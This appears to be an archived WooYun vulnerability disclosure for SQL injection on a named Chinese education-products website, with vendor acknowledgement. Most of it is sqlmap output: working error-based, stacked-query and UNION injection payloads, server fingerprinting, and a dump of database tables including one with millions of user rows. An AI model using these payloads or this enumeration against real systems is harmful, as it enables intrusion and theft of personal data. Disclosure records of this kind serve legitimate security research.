乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
http://www.fzjty.com/ProList.html?key=N
qlmap resumed the following injection point(s) from stored session:---Parameter: key (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: key=N%' AND 5624=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5624=5624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'=' Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: key=N%';WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: key=N%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(117)+CHAR(77)+CHAR(84)+CHAR(109)+CHAR(70)+CHAR(100)+CHAR(121)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: ksshop2+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| dbo.UserNumInfo | 2384686 || dbo.mobiler_code | 298310 || dbo.SerialNumber | 226323 || dbo.ViewProduct | 84232 || dbo.UserNumberRunTime | 61600 || dbo.Message | 25145 || dbo.CheckRecord | 12530 || dbo.TbKeyWordMonitor | 12241 || dbo.TbKeyWordMonitor | 12241 || dbo.tb_orderitem | 10399 || dbo.tb_orderitem | 10399 || dbo.tb_area | 3149 || dbo.vi_area_all | 3149 || dbo.User_Product | 2718 || dbo.View_AreaUserProduct | 2718 || dbo.CourseInfo | 1522 || dbo.tb_ChinaTeacherOrders | 1323 || dbo.Requestinfo_Product | 853 || dbo.Requestinfo_Product | 853 || dbo.tb_ExpProduct | 828 || dbo.[ShoolStatistics ] | 743 || dbo.tb_activeproduct | 610 || dbo.tb_FavProduct | 535 || dbo.tb_unitinfo | 487 || dbo.vi_unitinfo_all | 487 || dbo.vi_unitinfo_studentname | 487 || dbo.mobile_area | 460 || dbo.tb_product | 350 || dbo.teachinfo | 350 || dbo.View_GradeName | 350 || dbo.View_PackAge | 350 || dbo.View_ProductUnion | 350 || dbo.View_tb_product | 350 || dbo.View_Teachinfo | 350 || dbo.View_TypeName | 350 || dbo.tb_city | 348 || dbo.SpecialPriceProduct | 346 || dbo.SpecialPriceProduct | 346 || dbo.tb_subjectclass | 334 || dbo.tb_subjectclass | 334 || dbo.AreaStatistics | 306 || dbo.CategoryArea | 209 || dbo.TbShoppingCart | 185 || dbo.prodmodule | 170 || dbo.BatchInformation | 157 || dbo.tb_UserHelpQuestion | 114 || dbo.tb_student | 91 || dbo.vi_student_classes | 91 || dbo.tb_righttree | 84 || dbo.tb_unitclass | 81 || dbo.vi_unitclass_name | 81 || dbo.tb_idea | 74 || dbo.vi_teacher_unitclass | 66 || dbo.tb_unitname | 57 || dbo.tb_classes | 40 || dbo.TbMenu | 40 || dbo.vi_class_school | 40 || dbo.VersionFileName | 36 || dbo.tb_province | 34 || dbo.TbAdvertize | 31 || dbo.tb_category | 30 || dbo.tb_grade | 30 || dbo.vi_category_all | 30 || dbo.tb_company | 27 || dbo.tb_knowledge | 24 || dbo.tb_UserHelper | 24 || dbo.tb_UserHelper | 24 || dbo.tb_AdminHelper | 20 || dbo.Package | 19 || dbo.tb_HyperLink | 18 || dbo.Concern | 16 || dbo.tb_AdminHelpQuestion | 15 || dbo.tb_announcement | 14 || dbo.Gradearea | 13 || dbo.tb_job | 13 || dbo.Type | 13 || dbo.tb_serverlnow | 12 || dbo.tb_treeclass | 11 || dbo.tb_treeclass | 11 || dbo.tb_materialinfo | 10 || dbo.vi_teacher_classes | 10 || dbo.tb_contect | 9 || dbo.ActiveRange | 7 || dbo.dtproperties | 7 || dbo.tb_Region | 6 || dbo.TbLocation | 6 || dbo.Promotion | 5 || dbo.tb_manager | 5 || dbo.tb_rightmanager | 5 || dbo.tb_rightmanager | 5 || dbo.tb_school | 5 || dbo.tb_teachers | 5 || dbo.Exp_Orde | 4 || dbo.PresentType | 4 || dbo.tb_payment | 3 || dbo.VersionManage | 3 || dbo.tb_deliver | 2 || dbo.tb_knowcate | 2 || dbo.tb_WareHouse | 2 || dbo.ActiveInformation | 1 || dbo.comments | 1 || dbo.FreeFare | 1 || dbo.ImageInfo | 1 || dbo.tb_materialactive | 1 || dbo.tb_materialschool | 1 || dbo.TbProductAdvertize | 1 || dbo.TbVisit | 1 |+-----------------------------+---------+
危害等级:中
漏洞Rank:6
确认时间:2015-11-27 09:07
修复中,谢谢
暂无
